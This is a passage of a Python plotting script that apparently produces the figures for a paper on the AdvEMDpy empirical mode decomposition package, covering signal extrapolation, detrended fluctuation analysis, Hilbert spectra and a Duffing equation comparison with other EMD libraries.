int(2 * (len(lsq_signal) - 1) + 1 + i_right + 1)],
time_series=time_series_extended[int(2 * (len(lsq_signal) - 1) + 1):
int(2 * (len(lsq_signal) - 1) + 1 + i_right + 1)])
if sum(emd_utils_min.min_bool_func_1st_order_fd()) > 0:
min_count_right += 1
# backward <-
P = np.zeros((int(neural_network_k + 1), neural_network_m))
for col in range(neural_network_m):
P[:-1, col] = lsq_signal[int(col + 1):int(col + neural_network_k + 1)]
P[-1, col] = 1 # for additive constant
t = lsq_signal[:neural_network_m]
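# fit the backward weights as a convex least-squares problem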
vx = cvx.Variable(int(neural_network_k + 1))
objective = cvx.Minimize(cvx.norm((2 * (vx * P) + 1 - t), 2)) # linear activation function is arbitrary
prob = cvx.Problem(objective)
result = prob.solve(verbose=True, solver=cvx.ECOS)
weights_left = np.array(vx.value)
max_count_left = 0
min_count_left = 0
i_left = 0
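# extend the signal backwards until the extension contains at least one maximum and one minimum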
while ((max_count_left < 1) or (min_count_left < 1)) and (i_left < len(lsq_signal) - 1):
time_series_extended[int(len(lsq_signal) - 2 - i_left)] = \
2 * sum(weights_left * np.hstack((time_series_extended[int(len(lsq_signal) - 1 - i_left):
int(len(lsq_signal) - 1 - i_left + neural_network_k)],
1))) + 1
i_left += 1
if i_left > 1:
emd_utils_max = \
emd_utils.Utility(time=time_extended[int(len(lsq_signal) - 1 - i_left):int(len(lsq_signal))],
time_series=time_series_extended[int(len(lsq_signal) - 1 - i_left):int(len(lsq_signal))])
if sum(emd_utils_max.max_bool_func_1st_order_fd()) > 0:
max_count_left += 1
emd_utils_min = \
emd_utils.Utility(time=time_extended[int(len(lsq_signal) - 1 - i_left):int(len(lsq_signal))],
time_series=time_series_extended[int(len(lsq_signal) - 1 - i_left):int(len(lsq_signal))])
if sum(emd_utils_min.min_bool_func_1st_order_fd()) > 0:
min_count_left += 1
lsq_utils = emd_utils.Utility(time=time, time_series=lsq_signal)
utils_extended = emd_utils.Utility(time=time_extended, time_series=time_series_extended)
maxima = lsq_signal[lsq_utils.max_bool_func_1st_order_fd()]
maxima_time = time[lsq_utils.max_bool_func_1st_order_fd()]
maxima_extrapolate = time_series_extended[utils_extended.max_bool_func_1st_order_fd()][-1]
maxima_extrapolate_time = time_extended[utils_extended.max_bool_func_1st_order_fd()][-1]
minima = lsq_signal[lsq_utils.min_bool_func_1st_order_fd()]
minima_time = time[lsq_utils.min_bool_func_1st_order_fd()]
minima_extrapolate = time_series_extended[utils_extended.min_bool_func_1st_order_fd()][-2:]
minima_extrapolate_time = time_extended[utils_extended.min_bool_func_1st_order_fd()][-2:]
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title('Single Neuron Neural Network Example')
plt.plot(time, lsq_signal, zorder=2, label='Signal')
plt.plot(time_extended, time_series_extended, c='g', zorder=1, label=textwrap.fill('Extrapolated signal', 12))
plt.scatter(maxima_time, maxima, c='r', zorder=3, label='Maxima')
plt.scatter(minima_time, minima, c='b', zorder=3, label='Minima')
plt.scatter(maxima_extrapolate_time, maxima_extrapolate, c='magenta', zorder=3,
label=textwrap.fill('Extrapolated maxima', 12))
plt.scatter(minima_extrapolate_time, minima_extrapolate, c='cyan', zorder=4,
label=textwrap.fill('Extrapolated minima', 12))
plt.plot(((time[-302] + time[-301]) / 2) * np.ones(100), np.linspace(-2.75, 2.75, 100), c='k',
label=textwrap.fill('Neural network inputs', 13))
plt.plot(np.linspace(((time[-302] + time[-301]) / 2), ((time[-302] + time[-301]) / 2) + 0.1, 100),
-2.75 * np.ones(100), c='k')
plt.plot(np.linspace(((time[-302] + time[-301]) / 2), ((time[-302] + time[-301]) / 2) + 0.1, 100),
2.75 * np.ones(100), c='k')
plt.plot(np.linspace(((time_extended[-1001] + time_extended[-1002]) / 2),
((time_extended[-1001] + time_extended[-1002]) / 2) - 0.1, 100), -2.75 * np.ones(100), c='k')
plt.plot(np.linspace(((time_extended[-1001] + time_extended[-1002]) / 2),
((time_extended[-1001] + time_extended[-1002]) / 2) - 0.1, 100), 2.75 * np.ones(100), c='k')
plt.plot(((time_extended[-1001] + time_extended[-1002]) / 2) * np.ones(100), np.linspace(-2.75, 2.75, 100), c='k')
plt.plot(((time[-202] + time[-201]) / 2) * np.ones(100), np.linspace(-2.75, 2.75, 100), c='gray', linestyle='dashed',
label=textwrap.fill('Neural network targets', 13))
plt.plot(np.linspace(((time[-202] + time[-201]) / 2), ((time[-202] + time[-201]) / 2) + 0.1, 100),
-2.75 * np.ones(100), c='gray')
plt.plot(np.linspace(((time[-202] + time[-201]) / 2), ((time[-202] + time[-201]) / 2) + 0.1, 100),
2.75 * np.ones(100), c='gray')
plt.plot(np.linspace(((time_extended[-1001] + time_extended[-1000]) / 2),
((time_extended[-1001] + time_extended[-1000]) / 2) - 0.1, 100), -2.75 * np.ones(100), c='gray')
plt.plot(np.linspace(((time_extended[-1001] + time_extended[-1000]) / 2),
((time_extended[-1001] + time_extended[-1000]) / 2) - 0.1, 100), 2.75 * np.ones(100), c='gray')
plt.plot(((time_extended[-1001] + time_extended[-1000]) / 2) * np.ones(100), np.linspace(-2.75, 2.75, 100), c='gray',
linestyle='dashed')
plt.xlim(3.4 * np.pi, 5.6 * np.pi)
plt.xticks((4 * np.pi, 5 * np.pi), (r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.84, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/neural_network.png')
plt.show()
# plot 6a
np.random.seed(0)
time = np.linspace(0, 5 * np.pi, 1001)
knots_51 = np.linspace(0, 5 * np.pi, 51)
time_series = np.cos(2 * time) + np.cos(4 * time) + np.cos(8 * time)
noise = np.random.normal(0, 1, len(time_series))
time_series += noise
advemdpy = EMD(time=time, time_series=time_series)
imfs_51, hts_51, ifs_51 = advemdpy.empirical_mode_decomposition(knots=knots_51, max_imfs=3,
edge_effect='symmetric_anchor', verbose=False)[:3]
knots_31 = np.linspace(0, 5 * np.pi, 31)
imfs_31, hts_31, ifs_31 = advemdpy.empirical_mode_decomposition(knots=knots_31, max_imfs=2,
edge_effect='symmetric_anchor', verbose=False)[:3]
knots_11 = np.linspace(0, 5 * np.pi, 11)
imfs_11, hts_11, ifs_11 = advemdpy.empirical_mode_decomposition(knots=knots_11, max_imfs=1,
edge_effect='symmetric_anchor', verbose=False)[:3]
fig, axs = plt.subplots(3, 1)
plt.suptitle(textwrap.fill('Comparison of Trends Extracted with Different Knot Sequences', 40))
plt.subplots_adjust(hspace=0.1)
axs[0].plot(time, time_series, label='Time series')
axs[0].plot(time, imfs_51[1, :] + imfs_51[2, :] + imfs_51[3, :], label=textwrap.fill('Sum of IMF 1, IMF 2, & IMF 3 with 51 knots', 21))
print(f'DFA fluctuation with 51 knots: {np.round(np.var(time_series - (imfs_51[1, :] + imfs_51[2, :] + imfs_51[3, :])), 3)}')
for knot in knots_51:
axs[0].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[0].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[0].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[0].set_xticklabels(['', '', '', '', '', ''])
axs[0].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), 5.5 * np.ones(101), 'k--')
axs[0].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), -5.5 * np.ones(101), 'k--')
axs[0].plot(0.95 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--')
axs[0].plot(1.55 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--', label='Zoomed region')
box_0 = axs[0].get_position()
axs[0].set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
axs[0].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[1].plot(time, time_series, label='Time series')
axs[1].plot(time, imfs_31[1, :] + imfs_31[2, :], label=textwrap.fill('Sum of IMF 1 and IMF 2 with 31 knots', 19))
axs[1].plot(time, imfs_51[2, :] + imfs_51[3, :], label=textwrap.fill('Sum of IMF 2 and IMF 3 with 51 knots', 19))
print(f'DFA fluctuation with 31 knots: {np.round(np.var(time_series - (imfs_31[1, :] + imfs_31[2, :])), 3)}')
for knot in knots_31:
axs[1].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[1].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[1].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[1].set_xticklabels(['', '', '', '', '', ''])
box_1 = axs[1].get_position()
axs[1].set_position([box_1.x0 - 0.05, box_1.y0, box_1.width * 0.85, box_1.height])
axs[1].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[1].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), 5.5 * np.ones(101), 'k--')
axs[1].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), -5.5 * np.ones(101), 'k--')
axs[1].plot(0.95 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--')
axs[1].plot(1.55 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--', label='Zoomed region')
axs[2].plot(time, time_series, label='Time series')
axs[2].plot(time, imfs_11[1, :], label='IMF 1 with 11 knots')
axs[2].plot(time, imfs_31[2, :], label='IMF 2 with 31 knots')
axs[2].plot(time, imfs_51[3, :], label='IMF 3 with 51 knots')
print(f'DFA fluctuation with 11 knots: {np.round(np.var(time_series - imfs_11[1, :]), 3)}')
for knot in knots_11:
axs[2].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[2].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[2].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[2].set_xticklabels(['$0$', r'$\pi$', r'$2\pi$', r'$3\pi$', r'$4\pi$', r'$5\pi$'])
box_2 = axs[2].get_position()
axs[2].set_position([box_2.x0 - 0.05, box_2.y0, box_2.width * 0.85, box_2.height])
axs[2].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[2].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), 5.5 * np.ones(101), 'k--')
axs[2].plot(np.linspace(0.95 * np.pi, 1.55 * np.pi, 101), -5.5 * np.ones(101), 'k--')
axs[2].plot(0.95 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--')
axs[2].plot(1.55 * np.pi * np.ones(101), np.linspace(-5.5, 5.5, 101), 'k--', label='Zoomed region')
plt.savefig('jss_figures/DFA_different_trends.png')
plt.show()
# plot 6b
fig, axs = plt.subplots(3, 1)
plt.suptitle(textwrap.fill('Comparison of Trends Extracted with Different Knot Sequences Zoomed Region', 40))
plt.subplots_adjust(hspace=0.1)
axs[0].plot(time, time_series, label='Time series')
axs[0].plot(time, imfs_51[1, :] + imfs_51[2, :] + imfs_51[3, :], label=textwrap.fill('Sum of IMF 1, IMF 2, & IMF 3 with 51 knots', 21))
for knot in knots_51:
axs[0].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[0].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[0].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[0].set_xticklabels(['', '', '', '', '', ''])
box_0 = axs[0].get_position()
axs[0].set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
axs[0].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[0].set_ylim(-5.5, 5.5)
axs[0].set_xlim(0.95 * np.pi, 1.55 * np.pi)
axs[1].plot(time, time_series, label='Time series')
axs[1].plot(time, imfs_31[1, :] + imfs_31[2, :], label=textwrap.fill('Sum of IMF 1 and IMF 2 with 31 knots', 19))
axs[1].plot(time, imfs_51[2, :] + imfs_51[3, :], label=textwrap.fill('Sum of IMF 2 and IMF 3 with 51 knots', 19))
for knot in knots_31:
axs[1].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[1].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[1].set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi])
axs[1].set_xticklabels(['', '', '', '', '', ''])
box_1 = axs[1].get_position()
axs[1].set_position([box_1.x0 - 0.05, box_1.y0, box_1.width * 0.85, box_1.height])
axs[1].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[1].set_ylim(-5.5, 5.5)
axs[1].set_xlim(0.95 * np.pi, 1.55 * np.pi)
axs[2].plot(time, time_series, label='Time series')
axs[2].plot(time, imfs_11[1, :], label='IMF 1 with 11 knots')
axs[2].plot(time, imfs_31[2, :], label='IMF 2 with 31 knots')
axs[2].plot(time, imfs_51[3, :], label='IMF 3 with 51 knots')
for knot in knots_11:
axs[2].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1)
axs[2].plot(knot * np.ones(101), np.linspace(-5, 5, 101), '--', c='grey', zorder=1, label='Knots')
axs[2].set_xticks([np.pi, (3 / 2) * np.pi])
axs[2].set_xticklabels([r'$\pi$', r'$\frac{3}{2}\pi$'])
box_2 = axs[2].get_position()
axs[2].set_position([box_2.x0 - 0.05, box_2.y0, box_2.width * 0.85, box_2.height])
axs[2].legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
axs[2].set_ylim(-5.5, 5.5)
axs[2].set_xlim(0.95 * np.pi, 1.55 * np.pi)
plt.savefig('jss_figures/DFA_different_trends_zoomed.png')
plt.show()
hs_outputs = hilbert_spectrum(time, imfs_51, hts_51, ifs_51, max_frequency=12, plot=False)
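# hilbert_spectrum is assumed to return the time mesh, frequency mesh, and amplitude mesh,
# unpacked below as x_hs, y, and z.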
# plot 6c
ax = plt.subplot(111)
figure_size = plt.gcf().get_size_inches()
factor = 0.9
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of Simple Sinusoidal Time Series with Added Noise', 50))
x_hs, y, z = hs_outputs
z_min, z_max = 0, np.abs(z).max()
ax.pcolormesh(x_hs, y, np.abs(z), cmap='gist_rainbow', vmin=z_min, vmax=z_max)
ax.plot(x_hs[0, :], 8 * np.ones_like(x_hs[0, :]), '--', label=r'$\omega = 8$', linewidth=3)
ax.plot(x_hs[0, :], 4 * np.ones_like(x_hs[0, :]), '--', label=r'$\omega = 4$', linewidth=3)
ax.plot(x_hs[0, :], 2 * np.ones_like(x_hs[0, :]), '--', label=r'$\omega = 2$', linewidth=3)
ax.set_xticks([0, np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi])
ax.set_xticklabels(['$0$', r'$\pi$', r'$2\pi$', r'$3\pi$', r'$4\pi$'])
plt.ylabel(r'Frequency (rad.s$^{-1}$)')
plt.xlabel('Time (s)')
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0 + 0.05, box_0.width * 0.85, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/DFA_hilbert_spectrum.png')
plt.show()
# plot 6d
time = np.linspace(0, 5 * np.pi, 1001)
time_series = np.cos(time) + np.cos(5 * time)
knots = np.linspace(0, 5 * np.pi, 51)
fluc = Fluctuation(time=time, time_series=time_series)
max_unsmoothed = fluc.envelope_basis_function_approximation(knots_for_envelope=knots, extrema_type='maxima', smooth=False)
max_smoothed = fluc.envelope_basis_function_approximation(knots_for_envelope=knots, extrema_type='maxima', smooth=True)
min_unsmoothed = fluc.envelope_basis_function_approximation(knots_for_envelope=knots, extrema_type='minima', smooth=False)
min_smoothed = fluc.envelope_basis_function_approximation(knots_for_envelope=knots, extrema_type='minima', smooth=True)
util = Utility(time=time, time_series=time_series)
maxima = util.max_bool_func_1st_order_fd()
minima = util.min_bool_func_1st_order_fd()
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title(textwrap.fill('Plot Demonstrating Unsmoothed Extrema Envelopes if Schoenberg–Whitney Conditions are Not Satisfied', 50))
plt.plot(time, time_series, label='Time series', zorder=2, linewidth=2)
plt.scatter(time[maxima], time_series[maxima], c='r', label='Maxima', zorder=10)
plt.scatter(time[minima], time_series[minima], c='b', label='Minima', zorder=10)
plt.plot(time, max_unsmoothed[0], label=textwrap.fill('Unsmoothed maxima envelope', 10), c='darkorange')
plt.plot(time, max_smoothed[0], label=textwrap.fill('Smoothed maxima envelope', 10), c='red')
plt.plot(time, min_unsmoothed[0], label=textwrap.fill('Unsmoothed minima envelope', 10), c='cyan')
plt.plot(time, min_smoothed[0], label=textwrap.fill('Smoothed minima envelope', 10), c='blue')
for knot in knots[:-1]:
plt.plot(knot * np.ones(101), np.linspace(-3.0, -2.0, 101), '--', c='grey', zorder=1)
plt.plot(knots[-1] * np.ones(101), np.linspace(-3.0, -2.0, 101), '--', c='grey', label='Knots', zorder=1)
plt.xticks((0, 1 * np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi),
(r'$0$', r'$\pi$', r'2$\pi$', r'3$\pi$', r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
plt.xlim(-0.25 * np.pi, 5.25 * np.pi)
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.84, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/Schoenberg_Whitney_Conditions.png')
plt.show()
# plot 7
a = 0.25
width = 0.2
time = np.linspace((0 + a) * np.pi, (5 - a) * np.pi, 1001)
knots = np.linspace((0 + a) * np.pi, (5 - a) * np.pi, 11)
time_series = np.cos(time) + np.cos(5 * time)
utils = emd_utils.Utility(time=time, time_series=time_series)
max_bool = utils.max_bool_func_1st_order_fd()
maxima_x = time[max_bool]
maxima_y = time_series[max_bool]
min_bool = utils.min_bool_func_1st_order_fd()
minima_x = time[min_bool]
minima_y = time_series[min_bool]
inflection_bool = utils.inflection_point()
inflection_x = time[inflection_bool]
inflection_y = time_series[inflection_bool]
fluctuation = emd_mean.Fluctuation(time=time, time_series=time_series)
maxima_envelope = fluctuation.envelope_basis_function_approximation(knots, 'maxima', smooth=False,
smoothing_penalty=0.2, edge_effect='none',
spline_method='b_spline')[0]
maxima_envelope_smooth = fluctuation.envelope_basis_function_approximation(knots, 'maxima', smooth=True,
smoothing_penalty=0.2, edge_effect='none',
spline_method='b_spline')[0]
minima_envelope = fluctuation.envelope_basis_function_approximation(knots, 'minima', smooth=False,
smoothing_penalty=0.2, edge_effect='none',
spline_method='b_spline')[0]
minima_envelope_smooth = fluctuation.envelope_basis_function_approximation(knots, 'minima', smooth=True,
smoothing_penalty=0.2, edge_effect='none',
spline_method='b_spline')[0]
inflection_points_envelope = fluctuation.direct_detrended_fluctuation_estimation(knots,
smooth=True,
smoothing_penalty=0.2,
technique='inflection_points')[0]
binomial_points_envelope = fluctuation.direct_detrended_fluctuation_estimation(knots,
smooth=True,
smoothing_penalty=0.2,
technique='binomial_average', order=21,
increment=20)[0]
derivative_of_lsq = utils.derivative_forward_diff()
derivative_time = time[:-1]
derivative_knots = np.linspace(knots[0], knots[-1], 31)
# change (1) detrended_fluctuation_technique and (2) max_internal_iter and (3) debug (confusing with external debugging)
emd = AdvEMDpy.EMD(time=derivative_time, time_series=derivative_of_lsq)
imf_1_of_derivative = emd.empirical_mode_decomposition(knots=derivative_knots,
knot_time=derivative_time, text=False, verbose=False)[0][1, :]
utils = emd_utils.Utility(time=time[:-1], time_series=imf_1_of_derivative)
optimal_maxima = np.r_[False, utils.derivative_forward_diff() < 0, False] & \
np.r_[utils.zero_crossing() == 1, False]
optimal_minima = np.r_[False, utils.derivative_forward_diff() > 0, False] & \
np.r_[utils.zero_crossing() == 1, False]
EEMD_maxima_envelope = fluctuation.envelope_basis_function_approximation_fixed_points(knots, 'maxima',
optimal_maxima,
optimal_minima,
smooth=False,
smoothing_penalty=0.2,
edge_effect='none')[0]
EEMD_minima_envelope = fluctuation.envelope_basis_function_approximation_fixed_points(knots, 'minima',
optimal_maxima,
optimal_minima,
smooth=False,
smoothing_penalty=0.2,
edge_effect='none')[0]
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title('Detrended Fluctuation Analysis Examples')
plt.plot(time, time_series, linewidth=2, label='Time series')
plt.scatter(maxima_x, maxima_y, c='r', zorder=4, label='Maxima')
plt.scatter(minima_x, minima_y, c='b', zorder=4, label='Minima')
plt.scatter(time[optimal_maxima], time_series[optimal_maxima], c='darkred', zorder=4,
label=textwrap.fill('Optimal maxima', 10))
plt.scatter(time[optimal_minima], time_series[optimal_minima], c='darkblue', zorder=4,
label=textwrap.fill('Optimal minima', 10))
plt.scatter(inflection_x, inflection_y, c='magenta', zorder=4, label=textwrap.fill('Inflection points', 10))
plt.plot(time, maxima_envelope, c='darkblue', label=textwrap.fill('EMD envelope', 10))
plt.plot(time, minima_envelope, c='darkblue')
plt.plot(time, (maxima_envelope + minima_envelope) / 2, c='darkblue')
plt.plot(time, maxima_envelope_smooth, c='darkred', label=textwrap.fill('SEMD envelope', 10))
plt.plot(time, minima_envelope_smooth, c='darkred')
plt.plot(time, (maxima_envelope_smooth + minima_envelope_smooth) / 2, c='darkred')
plt.plot(time, EEMD_maxima_envelope, c='darkgreen', label=textwrap.fill('EEMD envelope', 10))
plt.plot(time, EEMD_minima_envelope, c='darkgreen')
plt.plot(time, (EEMD_maxima_envelope + EEMD_minima_envelope) / 2, c='darkgreen')
plt.plot(time, inflection_points_envelope, c='darkorange', label=textwrap.fill('Inflection point envelope', 10))
plt.plot(time, binomial_points_envelope, c='deeppink', label=textwrap.fill('Binomial average envelope', 10))
plt.plot(time, np.cos(time), c='black', label='True mean')
plt.xticks((0, 1 * np.pi, 2 * np.pi, 3 * np.pi, 4 * np.pi, 5 * np.pi), (r'$0$', r'$\pi$', r'2$\pi$', r'3$\pi$',
r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
plt.xlim(-0.25 * np.pi, 5.25 * np.pi)
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.84, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/detrended_fluctuation_analysis.png')
plt.show()
# Duffing Equation Example
def duffing_equation(xy, ts):
gamma = 0.1
epsilon = 1
omega = ((2 * np.pi) / 25)
return [xy[1], xy[0] - epsilon * xy[0] ** 3 + gamma * np.cos(omega * ts)]
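# The driving term has angular frequency omega = 2 * pi / 25 rad/s, i.e. f = 1 / 25 = 0.04 Hz,
# which is the 'Driving function frequency' marked on the Hilbert spectra below; the 0.124 Hz
# line is taken to be a Hamiltonian-based approximation of the oscillator's natural frequency.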
t = np.linspace(0, 150, 1501)
XY0 = [1, 1]
solution = odeint(duffing_equation, XY0, t)
x = solution[:, 0]
dxdt = solution[:, 1]
x_points = [0, 50, 100, 150]
x_names = [0, 50, 100, 150]
y_points_1 = [-2, 0, 2]
y_points_2 = [-1, 0, 1]
fig, axs = plt.subplots(2, 1)
plt.subplots_adjust(hspace=0.2)
axs[0].plot(t, x)
axs[0].set_title('Duffing Equation Displacement')
axs[0].set_ylim([-2, 2])
axs[0].set_xlim([0, 150])
axs[1].plot(t, dxdt)
axs[1].set_title('Duffing Equation Velocity')
axs[1].set_ylim([-1.5, 1.5])
axs[1].set_xlim([0, 150])
axis = 0
for ax in axs.flat:
ax.label_outer()
if axis == 0:
ax.set_ylabel('x(t)')
ax.set_yticks(y_points_1)
if axis == 1:
ax.set_ylabel(r'$ \dfrac{dx(t)}{dt} $')
ax.set(xlabel='t')
ax.set_yticks(y_points_2)
ax.set_xticks(x_points)
ax.set_xticklabels(x_names)
axis += 1
plt.savefig('jss_figures/Duffing_equation.png')
plt.show()
# compare other packages Duffing - top
pyemd = pyemd0215()
py_emd = pyemd(x)
IP, IF, IA = emd040.spectra.frequency_transform(py_emd.T, 10, 'hilbert')
freq_edges, freq_bins = emd040.spectra.define_hist_bins(0, 0.2, 100)
hht = emd040.spectra.hilberthuang(IF, IA, freq_edges)
hht = gaussian_filter(hht, sigma=1)
ax = plt.subplot(111)
figure_size = plt.gcf().get_size_inches()
factor = 1.0
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of Duffing Equation using PyEMD 0.2.10', 40))
plt.pcolormesh(t, freq_bins, hht, cmap='gist_rainbow', vmin=0, vmax=np.abs(hht).max())
plt.plot(t[:-1], 0.124 * np.ones_like(t[:-1]), '--', label=textwrap.fill('Hamiltonian frequency approximation', 15))
plt.plot(t[:-1], 0.04 * np.ones_like(t[:-1]), 'g--', label=textwrap.fill('Driving function frequency', 15))
plt.xticks([0, 50, 100, 150])
plt.yticks([0, 0.1, 0.2])
plt.ylabel('Frequency (Hz)')
plt.xlabel('Time (s)')
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0 + 0.05, box_0.width * 0.75, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/Duffing_equation_ht_pyemd.png')
plt.show()
emd_sift = emd040.sift.sift(x)
IP, IF, IA = emd040.spectra.frequency_transform(emd_sift, 10, 'hilbert')
freq_edges, freq_bins = emd040.spectra.define_hist_bins(0, 0.2, 100)
hht = emd040.spectra.hilberthuang(IF, IA, freq_edges)
hht = gaussian_filter(hht, sigma=1)
ax = plt.subplot(111)
figure_size = plt.gcf().get_size_inches()
factor = 1.0
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of Duffing Equation using emd 0.3.3', 40))
plt.pcolormesh(t, freq_bins, hht, cmap='gist_rainbow', vmin=0, vmax=np.abs(hht).max())
plt.plot(t[:-1], 0.124 * np.ones_like(t[:-1]), '--', label=textwrap.fill('Hamiltonian frequency approximation', 15))
plt.plot(t[:-1], 0.04 * np.ones_like(t[:-1]), 'g--', label=textwrap.fill('Driving function frequency', 15))
plt.xticks([0, 50, 100, 150])
plt.yticks([0, 0.1, 0.2])
plt.ylabel('Frequency (Hz)')
plt.xlabel('Time (s)')
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0 + 0.05, box_0.width * 0.75, box_0.height * 0.9])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/Duffing_equation_ht_emd.png')
plt.show()
# compare other packages Duffing - bottom
emd_duffing = AdvEMDpy.EMD(time=t, time_series=x)
emd_duff, emd_ht_duff, emd_if_duff, _, _, _, _ = emd_duffing.empirical_mode_decomposition(verbose=False)
fig, axs = plt.subplots(2, 1)
plt.subplots_adjust(hspace=0.3)
figure_size = plt.gcf().get_size_inches()
factor = 0.8
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
axs[0].plot(t, emd_duff[1, :], label='AdvEMDpy')
axs[0].plot(t, py_emd[0, :], '--', label='PyEMD 0.2.10')
axs[0].plot(t, emd_sift[:, 0], '--', label='emd 0.3.3')
axs[0].set_title('IMF 1')
axs[0].set_ylim([-2, 2])
axs[0].set_xlim([0, 150])
axs[1].plot(t, emd_duff[2, :], label='AdvEMDpy')
print(f'AdvEMDpy driving function error: {np.round(sum(abs(0.1 * np.cos(0.04 * 2 * np.pi * t) - emd_duff[2, :])), 3)}')
axs[1].plot(t, py_emd[1, :], '--', label='PyEMD 0.2.10')
print(f'PyEMD driving function error: {np.round(sum(abs(0.1 * np.cos(0.04 * 2 * np.pi * t) - py_emd[1, :])), 3)}')
axs[1].plot(t, emd_sift[:, 1], '--', label='emd 0.3.3')
print(f'emd driving function error: {np.round(sum(abs(0.1 * np.cos(0.04 * 2 * np.pi * t) - emd_sift[:, 1])), 3)}')
axs[1].plot(t, 0.1 * np.cos(0.04 * 2 * np.pi * t), '--', label=r'$0.1$cos$(0.08{\pi}t)$')
axs[1].set_title('IMF 2')
axs[1].set_ylim([-0.2, 0.4])
axs[1].set_xlim([0, 150])
axis = 0
for ax in axs.flat:
ax.label_outer()
if axis == 0:
ax.set_ylabel(r'$\gamma_1(t)$')
ax.set_yticks([-2, 0, 2])
if axis == 1:
ax.set_ylabel(r'$\gamma_2(t)$')
ax.set_yticks([-0.2, 0, 0.2])
box_0 = ax.get_position()
ax.set_position([box_0.x0, box_0.y0, box_0.width * 0.85, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5), fontsize=8)
ax.set_xticks(x_points)
ax.set_xticklabels(x_names)
axis += 1
plt.savefig('jss_figures/Duffing_equation_imfs.png')
plt.show()
hs_outputs = hilbert_spectrum(t, emd_duff, emd_ht_duff, emd_if_duff, max_frequency=1.3, plot=False)
ax = plt.subplot(111)
plt.title(textwrap.fill('Gaussian Filtered Hilbert Spectrum of Duffing Equation using AdvEMDpy', 40))
x, y, z = hs_outputs
y = y / (2 * np.pi)
z_min, z_max = 0, np.abs(z).max()
figure_size = plt.gcf().get_size_inches()
